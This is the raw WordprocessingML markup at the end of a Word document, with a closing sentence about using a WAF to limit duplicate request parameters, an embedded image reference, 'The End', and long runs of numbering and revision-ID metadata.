      <w:r w:rsidR="0BFBF224">
        <w:rPr/>
        <w:t>below)</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">Therefore, it is </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>not uncommon</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> to use the WAF to limit the maximum number of instances of the same parameters to 1 in any single request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3BB3AD" w:rsidP="699639B3" w:rsidRDefault="727384C8" w14:paraId="76B2EC3A" w14:textId="261ED39C">
      <w:r w:rsidR="727384C8">
        <w:drawing>
          <wp:inline wp14:editId="586CA0B0" wp14:anchorId="0797B31C">
            <wp:extent cx="5943600" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="692684176" name="Picture 692684176" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 692684176"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R6e27861bcc904e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24250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="443A55B5" w:rsidP="699639B3" w:rsidRDefault="443A55B5" w14:paraId="3D93A8D7" w14:textId="4DBE8C64">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>The End</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="443A55B5">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intelligence.xml><?xml version="1.0" encoding="utf-8"?>
<int:Intelligence xmlns:int="http://schemas.microsoft.com/office/intelligence/2019/intelligence">
  <int:IntelligenceSettings/>
  <int:Manifest>
    <int:WordHash hashCode="+hy8M85sF9u9T4" id="bLBiEny8"/>
    <int:WordHash hashCode="kajDhAlKYMTjji" id="vyY3P5Wu"/>
    <int:WordHash hashCode="wCgj9rKdcuGrsF" id="KAI/7B2G"/>
    <int:WordHash hashCode="NQmjNebJV7gKRy" id="Iyf4dBL+"/>
  </int:Manifest>
  <int:Observations>
    <int:Content id="bLBiEny8">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="vyY3P5Wu">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="KAI/7B2G">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="Iyf4dB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193722"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="942E2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A5F9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE1E7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4069E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418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86FB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418A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B60B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6D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D70C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418A5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568DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="303A7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906A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29BA3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B544F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71703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8D6EB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38D0DD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F41808"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38DA788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E541AC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74F6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F63D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7090D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B843EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13DAF5EA"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">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3A01BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90D486F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D5216C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB9E5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E31A3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC761C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2458D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB86F6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9B427A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E35E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F2064"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D683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660F44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E24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DD86DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66009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FE65098"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3422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4010D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FDC72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DC854A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D36EE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4C32218"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67F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322EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E184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572CD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C84C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1">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="19"/>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7D8"/>
    <w:rsid w:val="00005796"/>
    <w:rsid w:val="0003003E"/>
    <w:rsid w:val="000539EB"/>
    <w:rsid w:val="0005619E"/>
    <w:rsid w:val="00066E6C"/>
    <w:rsid w:val="00072E2A"/>
    <w:rsid w:val="00085EA0"/>
    <w:rsid w:val="0009366E"/>
    <w:rsid w:val="000B344F"/>
    <w:rsid w:val="000C01C7"/>
    <w:rsid w:val="00117FA8"/>
    <w:rsid w:val="00163BC3"/>
    <w:rsid w:val="00165A23"/>
    <w:rsid w:val="00165C52"/>
    <w:rsid w:val="001A6FEB"/>
    <w:rsid w:val="001C2E62"/>
    <w:rsid w:val="001C79E3"/>
    <w:rsid w:val="001D4841"/>
    <w:rsid w:val="00216411"/>
    <w:rsid w:val="00265211"/>
    <w:rsid w:val="002939CF"/>
    <w:rsid w:val="002B1ABD"/>
    <w:rsid w:val="002F3A9D"/>
    <w:rsid w:val="002F558A"/>
    <w:rsid w:val="00300C97"/>
    <w:rsid w:val="00307BB7"/>
    <w:rsid w:val="003206DE"/>
    <w:rsid w:val="00335A8B"/>
    <w:rsid w:val="00350D57"/>
    <w:rsid w:val="00364438"/>
    <w:rsid w:val="003B23D0"/>
    <w:rsid w:val="003B48A4"/>
    <w:rsid w:val="003EAC07"/>
    <w:rsid w:val="00430547"/>
    <w:rsid w:val="004A044A"/>
    <w:rsid w:val="004A053E"/>
    <w:rsid w:val="004A7A51"/>
    <w:rsid w:val="004B3EB5"/>
    <w:rsid w:val="004B6A8F"/>
    <w:rsid w:val="004C306A"/>
    <w:rsid w:val="0050605A"/>
    <w:rsid w:val="00524D2A"/>
    <w:rsid w:val="00532BCB"/>
    <w:rsid w:val="00533381"/>
    <w:rsid w:val="00544AC0"/>
    <w:rsid w:val="00562548"/>
    <w:rsid w:val="0058093A"/>
    <w:rsid w:val="005A17E3"/>
    <w:rsid w:val="005ED454"/>
    <w:rsid w:val="0066149A"/>
    <w:rsid w:val="00670816"/>
    <w:rsid w:val="006B6C0B"/>
    <w:rsid w:val="0070629D"/>
    <w:rsid w:val="00706655"/>
    <w:rsid w:val="00742FDD"/>
    <w:rsid w:val="0078783F"/>
    <w:rsid w:val="007C1685"/>
    <w:rsid w:val="007D01EA"/>
    <w:rsid w:val="007D2CCA"/>
    <w:rsid w:val="007E4561"/>
    <w:rsid w:val="00816D3F"/>
    <w:rsid w:val="0082437E"/>
    <w:rsid w:val="00842B10"/>
    <w:rsid w:val="00844F45"/>
    <w:rsid w:val="008567D8"/>
    <w:rsid w:val="00874BA5"/>
    <w:rsid w:val="00874BC9"/>
    <w:rsid w:val="0087636E"/>
    <w:rsid w:val="0088536F"/>
    <w:rsid w:val="008D49F7"/>
    <w:rsid w:val="008E0B96"/>
    <w:rsid w:val="008F112A"/>
    <w:rsid w:val="008F1BC3"/>
    <w:rsid w:val="008F3E5B"/>
    <w:rsid w:val="00906956"/>
    <w:rsid w:val="009307BA"/>
    <w:rsid w:val="009317F6"/>
    <w:rsid w:val="009839C7"/>
    <w:rsid w:val="009D66ED"/>
    <w:rsid w:val="009D6C0F"/>
    <w:rsid w:val="009F3944"/>
    <w:rsid w:val="00A0423C"/>
    <w:rsid w:val="00A06241"/>
    <w:rsid w:val="00A32331"/>
    <w:rsid w:val="00A51F32"/>
    <w:rsid w:val="00A6431B"/>
    <w:rsid w:val="00A662E2"/>
    <w:rsid w:val="00A77C3A"/>
    <w:rsid w:val="00A94FC9"/>
    <w:rsid w:val="00AA6057"/>
    <w:rsid w:val="00AB4F66"/>
    <w:rsid w:val="00AE01F4"/>
    <w:rsid w:val="00AE794C"/>
    <w:rsid w:val="00AF6AE0"/>
    <w:rsid w:val="00B06233"/>
    <w:rsid w:val="00B077D3"/>
    <w:rsid w:val="00BB5D94"/>
    <w:rsid w:val="00BC1D15"/>
    <w:rsid w:val="00BE07BF"/>
    <w:rsid w:val="00C01393"/>
    <w:rsid w:val="00C15A64"/>
    <w:rsid w:val="00C20278"/>
    <w:rsid w:val="00C34781"/>
    <w:rsid w:val="00C52524"/>
    <w:rsid w:val="00C65CF8"/>
    <w:rsid w:val="00C74BF3"/>
    <w:rsid w:val="00C81995"/>
    <w:rsid w:val="00CB18B9"/>
    <w:rsid w:val="00CB5339"/>
    <w:rsid w:val="00CC1589"/>
    <w:rsid w:val="00D140A2"/>
    <w:rsid w:val="00D73AD5"/>
    <w:rsid w:val="00DD44CB"/>
    <w:rsid w:val="00DE0B13"/>
    <w:rsid w:val="00DE1F9B"/>
    <w:rsid w:val="00DF5163"/>
    <w:rsid w:val="00E032AF"/>
    <w:rsid w:val="00E26DD5"/>
    <w:rsid w:val="00E61801"/>
    <w:rsid w:val="00E74BAD"/>
    <w:rsid w:val="00E90E4D"/>
    <w:rsid w:val="00EC4A65"/>
    <w:rsid w:val="00ED5020"/>
    <w:rsid w:val="00EDBF3A"/>
    <w:rsid w:val="00EE3F68"/>
    <w:rsid w:val="00EF5231"/>
    <w:rsid w:val="00F04263"/>
    <w:rsid w:val="00F04907"/>
    <w:rsid w:val="00F0C301"/>
    <w:rsid w:val="00F15D80"/>
    <w:rsid w:val="00F37E6D"/>
    <w:rsid w:val="00F500DB"/>
    <w:rsid w:val="00F7207D"/>
    <w:rsid w:val="00FE0ADE"/>
    <w:rsid w:val="00FF500C"/>
    <w:rsid w:val="011B064C"/>
    <w:rsid w:val="014C4F57"/>
    <w:rsid w:val="01637076"/>
    <w:rsid w:val="01863C00"/>
    <w:rsid w:val="01A881D7"/>
    <w:rsid w:val="01B6C461"/>
    <w:rsid w:val="01BF9689"/>
    <w:rsid w:val="01BF9689"/>
    <w:rsid w:val="01DD65A5"/>
    <w:rsid w:val="01E104E1"/>
    <w:rsid w:val="01E104E1"/>
    <w:rsid w:val="01F8303C"/>
    <w:rsid w:val="021CBE2A"/>
    <w:rsid w:val="02201430"/>
    <w:rsid w:val="022DDCB4"/>
    <w:rsid w:val="02514F23"/>
    <w:rsid w:val="0286404A"/>
    <w:rsid w:val="028C9362"/>
    <w:rsid w:val="0300990E"/>
    <w:rsid w:val="03146751"/>
    <w:rsid w:val="0315DFD0"/>
    <w:rsid w:val="034CAB72"/>
    <w:rsid w:val="03502AF8"/>
    <w:rsid w:val="039C011B"/>
    <w:rsid w:val="03B13553"/>
    <w:rsid w:val="03BBB4C7"/>
    <w:rsid w:val="03C3DADA"/>
    <w:rsid w:val="03E30C80"/>
    <w:rsid w:val="03E60FA1"/>
    <w:rsid w:val="03F78C4C"/>
    <w:rsid w:val="0408EE2F"/>
    <w:rsid w:val="044FAA06"/>
    <w:rsid w:val="0451B6F4"/>
    <w:rsid w:val="047F8063"/>
    <w:rsid w:val="04A078C7"/>
    <w:rsid w:val="04A72BA8"/>
    <w:rsid w:val="04A8335A"/>
    <w:rsid w:val="04A8335A"/>
    <w:rsid w:val="04BA3256"/>
    <w:rsid w:val="04BCB0B7"/>
    <w:rsid w:val="04CCA7B0"/>
    <w:rsid w:val="04EF5216"/>
    <w:rsid w:val="051E4BD9"/>
    <w:rsid w:val="0543580E"/>
    <w:rsid w:val="05649643"/>
    <w:rsid w:val="056E0CB0"/>
    <w:rsid w:val="0586E09E"/>
    <w:rsid w:val="05F61C0C"/>
    <w:rsid w:val="06096C9B"/>
    <w:rsid w:val="0630665A"/>
    <w:rsid w:val="06776BA0"/>
    <w:rsid w:val="06E90C10"/>
    <w:rsid w:val="06FCDC22"/>
    <w:rsid w:val="075472B6"/>
    <w:rsid w:val="0759CC7E"/>
    <w:rsid w:val="07726288"/>
    <w:rsid w:val="077A7D66"/>
    <w:rsid w:val="0791C480"/>
    <w:rsid w:val="08036E22"/>
    <w:rsid w:val="08205B0B"/>
    <w:rsid w:val="0823B8C6"/>
    <w:rsid w:val="087495A8"/>
    <w:rsid w:val="08F440FD"/>
    <w:rsid w:val="0914A931"/>
    <w:rsid w:val="09443863"/>
    <w:rsid w:val="09509402"/>
    <w:rsid w:val="097550F8"/>
    <w:rsid w:val="09814377"/>
    <w:rsid w:val="0985D340"/>
    <w:rsid w:val="098F0B59"/>
    <w:rsid w:val="09B6A24D"/>
    <w:rsid w:val="09BA41D3"/>
    <w:rsid w:val="09CB02A6"/>
    <w:rsid w:val="09ED6B8C"/>
    <w:rsid w:val="0A025FF3"/>
    <w:rsid w:val="0A482B8C"/>
    <w:rsid w:val="0A4F34C8"/>
    <w:rsid w:val="0A6262CD"/>
    <w:rsid w:val="0A72C5E3"/>
    <w:rsid w:val="0A7D2D34"/>
    <w:rsid w:val="0A913DC5"/>
    <w:rsid w:val="0A9720DC"/>
    <w:rsid w:val="0A9D72E3"/>
    <w:rsid w:val="0ACFB63F"/>
    <w:rsid w:val="0AE20B9B"/>
    <w:rsid w:val="0B07256A"/>
    <w:rsid w:val="0B07E588"/>
    <w:rsid w:val="0B164D17"/>
    <w:rsid w:val="0B2824C6"/>
    <w:rsid w:val="0B36E9D1"/>
    <w:rsid w:val="0B4573EE"/>
    <w:rsid w:val="0B5ED88C"/>
    <w:rsid w:val="0B65284F"/>
    <w:rsid w:val="0B8481DA"/>
    <w:rsid w:val="0B9C7BFD"/>
    <w:rsid w:val="0B9C7BFD"/>
    <w:rsid w:val="0BC04671"/>
    <w:rsid w:val="0BC85D24"/>
    <w:rsid w:val="0BF241EA"/>
    <w:rsid w:val="0BF6A816"/>
    <w:rsid w:val="0BFBF224"/>
    <w:rsid w:val="0C1ACEDB"/>
    <w:rsid w:val="0C1EB9BE"/>
    <w:rsid w:val="0C61082B"/>
    <w:rsid w:val="0CB93463"/>
    <w:rsid w:val="0CC038C3"/>
    <w:rsid w:val="0CD52566"/>
    <w:rsid w:val="0CFF0B51"/>
    <w:rsid w:val="0D13029A"/>
    <w:rsid w:val="0D276A4C"/>
    <w:rsid w:val="0D5263C1"/>
    <w:rsid w:val="0D59941F"/>
    <w:rsid w:val="0D5C16D2"/>
    <w:rsid w:val="0D5C16D2"/>
    <w:rsid w:val="0D9EE2B2"/>
    <w:rsid w:val="0DA70832"/>
    <w:rsid w:val="0DCC1D8D"/>
    <w:rsid w:val="0DF80279"/>
    <w:rsid w:val="0E0CF8B7"/>
    <w:rsid w:val="0E2FAE07"/>
    <w:rsid w:val="0E3A0393"/>
    <w:rsid w:val="0E67FACB"/>
    <w:rsid w:val="0EB2D020"/>
    <w:rsid w:val="0EB79789"/>
    <w:rsid w:val="0ECD24ED"/>
    <w:rsid w:val="0EED8303"/>
    <w:rsid w:val="0EF12429"/>
    <w:rsid w:val="0F2B2FAC"/>
    <w:rsid w:val="0F40B04F"/>
    <w:rsid w:val="0F46A4A0"/>
    <w:rsid w:val="0F655ACA"/>
    <w:rsid w:val="0F7264FF"/>
    <w:rsid w:val="0F81AD8E"/>
    <w:rsid w:val="0F833DD3"/>
    <w:rsid w:val="0F87441E"/>
    <w:rsid w:val="0F97E62A"/>
    <w:rsid w:val="0FB0FFFF"/>
    <w:rsid w:val="0FB9C12A"/>
    <w:rsid w:val="0FD0533C"/>
    <w:rsid w:val="0FD1997C"/>
    <w:rsid w:val="0FE5D3A2"/>
    <w:rsid w:val="0FF0D525"/>
    <w:rsid w:val="102EAE00"/>
    <w:rsid w:val="1030FA1D"/>
    <w:rsid w:val="10357824"/>
    <w:rsid w:val="10AA892B"/>
    <w:rsid w:val="10AD5D07"/>
    <w:rsid w:val="10CCFC3A"/>
    <w:rsid w:val="10D1AD71"/>
    <w:rsid w:val="10F7F34A"/>
    <w:rsid w:val="110DADA9"/>
    <w:rsid w:val="111B6D86"/>
    <w:rsid w:val="111DA986"/>
    <w:rsid w:val="1132D848"/>
    <w:rsid w:val="1169045D"/>
    <w:rsid w:val="1174621F"/>
    <w:rsid w:val="1197664A"/>
    <w:rsid w:val="1198FA11"/>
    <w:rsid w:val="11AD45B2"/>
    <w:rsid w:val="11BAE490"/>
    <w:rsid w:val="11C8D716"/>
    <w:rsid w:val="12080A12"/>
    <w:rsid w:val="120B17D0"/>
    <w:rsid w:val="120F427F"/>
    <w:rsid w:val="121C37B4"/>
    <w:rsid w:val="1237C75A"/>
    <w:rsid w:val="12A8C1CE"/>
    <w:rsid w:val="12C9B48B"/>
    <w:rsid w:val="13299598"/>
    <w:rsid w:val="132D8FE4"/>
    <w:rsid w:val="132DD2BC"/>
    <w:rsid w:val="1331646C"/>
    <w:rsid w:val="1337E022"/>
    <w:rsid w:val="133BF861"/>
    <w:rsid w:val="13436297"/>
    <w:rsid w:val="1360C599"/>
    <w:rsid w:val="1367DD5C"/>
    <w:rsid w:val="136F014C"/>
    <w:rsid w:val="13803B44"/>
    <w:rsid w:val="13819509"/>
    <w:rsid w:val="1393E6FB"/>
    <w:rsid w:val="13A730E9"/>
    <w:rsid w:val="13E1A7F0"/>
    <w:rsid w:val="13E54334"/>
    <w:rsid w:val="144C20C9"/>
    <w:rsid w:val="146A506D"/>
    <w:rsid w:val="146A506D"/>
    <w:rsid w:val="14A37FED"/>
    <w:rsid w:val="14B94927"/>
    <w:rsid w:val="14C3B6B7"/>
    <w:rsid w:val="14D80F75"/>
    <w:rsid w:val="14E34479"/>
    <w:rsid w:val="1517261E"/>
    <w:rsid w:val="1545E04D"/>
    <w:rsid w:val="15658A88"/>
    <w:rsid w:val="1586DAB5"/>
    <w:rsid w:val="15B14CCC"/>
    <w:rsid w:val="15BF146C"/>
    <w:rsid w:val="15E00D41"/>
    <w:rsid w:val="15E0CB9B"/>
    <w:rsid w:val="1603264D"/>
    <w:rsid w:val="16067016"/>
    <w:rsid w:val="161E66FA"/>
    <w:rsid w:val="1626A3AD"/>
    <w:rsid w:val="166A5F7A"/>
    <w:rsid w:val="16796947"/>
    <w:rsid w:val="169C8814"/>
    <w:rsid w:val="16AED19E"/>
    <w:rsid w:val="16C9B2F1"/>
    <w:rsid w:val="16E30DB1"/>
    <w:rsid w:val="17567B8A"/>
    <w:rsid w:val="17724DCC"/>
    <w:rsid w:val="177F5368"/>
    <w:rsid w:val="1806C2DF"/>
    <w:rsid w:val="180F921D"/>
    <w:rsid w:val="181C277E"/>
    <w:rsid w:val="181D0E57"/>
    <w:rsid w:val="18205537"/>
    <w:rsid w:val="182DAF30"/>
    <w:rsid w:val="18367A10"/>
    <w:rsid w:val="184C1F62"/>
    <w:rsid w:val="184FDE28"/>
    <w:rsid w:val="1861BA02"/>
    <w:rsid w:val="1865DC8D"/>
    <w:rsid w:val="1875DE9E"/>
    <w:rsid w:val="189AD789"/>
    <w:rsid w:val="190CFA40"/>
    <w:rsid w:val="193115F4"/>
    <w:rsid w:val="193F01EF"/>
    <w:rsid w:val="193F01EF"/>
    <w:rsid w:val="19502B27"/>
    <w:rsid w:val="196F390B"/>
    <w:rsid w:val="197E8F0E"/>
    <w:rsid w:val="19A503FB"/>
    <w:rsid w:val="19B85AC4"/>
    <w:rsid w:val="19C5FC8D"/>
    <w:rsid w:val="1A12C7EA"/>
    <w:rsid w:val="1A1C61D7"/>
    <w:rsid w:val="1A273076"/>
    <w:rsid w:val="1A34C537"/>
    <w:rsid w:val="1A3BB3AD"/>
    <w:rsid w:val="1A3EC13C"/>
    <w:rsid w:val="1A527323"/>
    <w:rsid w:val="1A668983"/>
    <w:rsid w:val="1A6DFF5C"/>
    <w:rsid w:val="1A974FB1"/>
    <w:rsid w:val="1ABE26B4"/>
    <w:rsid w:val="1AD78E20"/>
    <w:rsid w:val="1B09FCCE"/>
    <w:rsid w:val="1B190104"/>
    <w:rsid w:val="1B3B81BF"/>
    <w:rsid w:val="1B51FBFC"/>
    <w:rsid w:val="1B546733"/>
    <w:rsid w:val="1B613585"/>
    <w:rsid w:val="1B722F6C"/>
    <w:rsid w:val="1B8C21BF"/>
    <w:rsid w:val="1BBA3D76"/>
    <w:rsid w:val="1BBB75F9"/>
    <w:rsid w:val="1BBE1686"/>
    <w:rsid w:val="1BBEF359"/>
    <w:rsid w:val="1BC32FDD"/>
    <w:rsid w:val="1C18C397"/>
    <w:rsid w:val="1C3928E5"/>
    <w:rsid w:val="1C41A194"/>
    <w:rsid w:val="1C89CB75"/>
    <w:rsid w:val="1CA4ECB9"/>
    <w:rsid w:val="1CB51873"/>
    <w:rsid w:val="1CD1589A"/>
    <w:rsid w:val="1CD72C20"/>
    <w:rsid w:val="1CD878D1"/>
    <w:rsid w:val="1D2DF2B8"/>
    <w:rsid w:val="1D3788A9"/>
    <w:rsid w:val="1D43E98F"/>
    <w:rsid w:val="1D897F6D"/>
    <w:rsid w:val="1D90D8E6"/>
    <w:rsid w:val="1D9319BB"/>
    <w:rsid w:val="1DBA7704"/>
    <w:rsid w:val="1DDBF2DE"/>
    <w:rsid w:val="1E435EA2"/>
    <w:rsid w:val="1E4473F9"/>
    <w:rsid w:val="1E693050"/>
    <w:rsid w:val="1E84C02A"/>
    <w:rsid w:val="1E869D41"/>
    <w:rsid w:val="1EC32B09"/>
    <w:rsid w:val="1EC67EE9"/>
    <w:rsid w:val="1EC83AB9"/>
    <w:rsid w:val="1EC88829"/>
    <w:rsid w:val="1EEC916E"/>
    <w:rsid w:val="1EEC916E"/>
    <w:rsid w:val="1F70B452"/>
    <w:rsid w:val="1F746E58"/>
    <w:rsid w:val="1FA61E36"/>
    <w:rsid w:val="1FC32761"/>
    <w:rsid w:val="1FD11B5E"/>
    <w:rsid w:val="1FEADC78"/>
    <w:rsid w:val="2001F4CB"/>
    <w:rsid w:val="20189F87"/>
    <w:rsid w:val="207E34A3"/>
    <w:rsid w:val="208AE30A"/>
    <w:rsid w:val="209BE027"/>
    <w:rsid w:val="20B7B257"/>
    <w:rsid w:val="20EA645D"/>
    <w:rsid w:val="20EC396E"/>
    <w:rsid w:val="20FA9A2A"/>
    <w:rsid w:val="2109ED79"/>
    <w:rsid w:val="211FEAB1"/>
    <w:rsid w:val="213B1F81"/>
    <w:rsid w:val="214125CF"/>
    <w:rsid w:val="21439165"/>
    <w:rsid w:val="21646B42"/>
    <w:rsid w:val="217BF616"/>
    <w:rsid w:val="217EA3D2"/>
    <w:rsid w:val="217EA3D2"/>
    <w:rsid w:val="2189A0F3"/>
    <w:rsid w:val="218E9872"/>
    <w:rsid w:val="21921A5E"/>
    <w:rsid w:val="21AF5909"/>
    <w:rsid w:val="21B1CB40"/>
    <w:rsid w:val="222CE8B0"/>
    <w:rsid w:val="22487173"/>
    <w:rsid w:val="225E966C"/>
    <w:rsid w:val="226FE444"/>
    <w:rsid w:val="22B50073"/>
    <w:rsid w:val="22C2CDFA"/>
    <w:rsid w:val="22CB744F"/>
    <w:rsid w:val="22CC0BD1"/>
    <w:rsid w:val="22DF7982"/>
    <w:rsid w:val="230E2603"/>
    <w:rsid w:val="2335A511"/>
    <w:rsid w:val="235AD79B"/>
    <w:rsid w:val="235AD79B"/>
    <w:rsid w:val="238F01D1"/>
    <w:rsid w:val="239C3103"/>
    <w:rsid w:val="23E0A8FA"/>
    <w:rsid w:val="2401FF8F"/>
    <w:rsid w:val="24081CAE"/>
    <w:rsid w:val="24193447"/>
    <w:rsid w:val="2421FB0E"/>
    <w:rsid w:val="243BD87F"/>
    <w:rsid w:val="24402D75"/>
    <w:rsid w:val="2476FFA3"/>
    <w:rsid w:val="24D37ECF"/>
    <w:rsid w:val="24DC13B2"/>
    <w:rsid w:val="250D3359"/>
    <w:rsid w:val="2552DDA5"/>
    <w:rsid w:val="2563658B"/>
    <w:rsid w:val="256CE68C"/>
    <w:rsid w:val="2591B92E"/>
    <w:rsid w:val="25942CE7"/>
    <w:rsid w:val="259BCE75"/>
    <w:rsid w:val="259EA80C"/>
    <w:rsid w:val="25A77BF8"/>
    <w:rsid w:val="25A81B8C"/>
    <w:rsid w:val="25BC0C45"/>
    <w:rsid w:val="25D378D8"/>
    <w:rsid w:val="25D6577F"/>
    <w:rsid w:val="25E3FEFA"/>
    <w:rsid w:val="25EC89FE"/>
    <w:rsid w:val="25F1E164"/>
    <w:rsid w:val="25F25D5D"/>
    <w:rsid w:val="25FF31D0"/>
    <w:rsid w:val="2608935E"/>
    <w:rsid w:val="2635B382"/>
    <w:rsid w:val="2642F0F1"/>
    <w:rsid w:val="264EE83A"/>
    <w:rsid w:val="265FFCA8"/>
    <w:rsid w:val="26710F74"/>
    <w:rsid w:val="2681B805"/>
    <w:rsid w:val="26A942C8"/>
    <w:rsid w:val="26C43E8D"/>
    <w:rsid w:val="26E3DA47"/>
    <w:rsid w:val="27073202"/>
    <w:rsid w:val="27371931"/>
    <w:rsid w:val="274DFFE2"/>
    <w:rsid w:val="27885A5F"/>
    <w:rsid w:val="279EEC9C"/>
    <w:rsid w:val="27A08224"/>
    <w:rsid w:val="27A2EE48"/>
    <w:rsid w:val="27C3F8EA"/>
    <w:rsid w:val="2810988B"/>
    <w:rsid w:val="2829E4EE"/>
    <w:rsid w:val="282BEDA2"/>
    <w:rsid w:val="28421E7F"/>
    <w:rsid w:val="28528A39"/>
    <w:rsid w:val="2899A9A3"/>
    <w:rsid w:val="28BCDAC9"/>
    <w:rsid w:val="28C5EC34"/>
    <w:rsid w:val="28EB0930"/>
    <w:rsid w:val="28EEF7B7"/>
    <w:rsid w:val="28F05B5A"/>
    <w:rsid w:val="28FAB926"/>
    <w:rsid w:val="292AE1B6"/>
    <w:rsid w:val="29612422"/>
    <w:rsid w:val="29632D62"/>
    <w:rsid w:val="296D434D"/>
    <w:rsid w:val="2992F7D6"/>
    <w:rsid w:val="2A06B891"/>
    <w:rsid w:val="2A12F542"/>
    <w:rsid w:val="2A21EA0F"/>
    <w:rsid w:val="2A54E1EC"/>
    <w:rsid w:val="2A599EDF"/>
    <w:rsid w:val="2A78900D"/>
    <w:rsid w:val="2A80B828"/>
    <w:rsid w:val="2A905582"/>
    <w:rsid w:val="2ABB397C"/>
    <w:rsid w:val="2ADC71EA"/>
    <w:rsid w:val="2ADCC194"/>
    <w:rsid w:val="2B17A3B3"/>
    <w:rsid w:val="2B23006D"/>
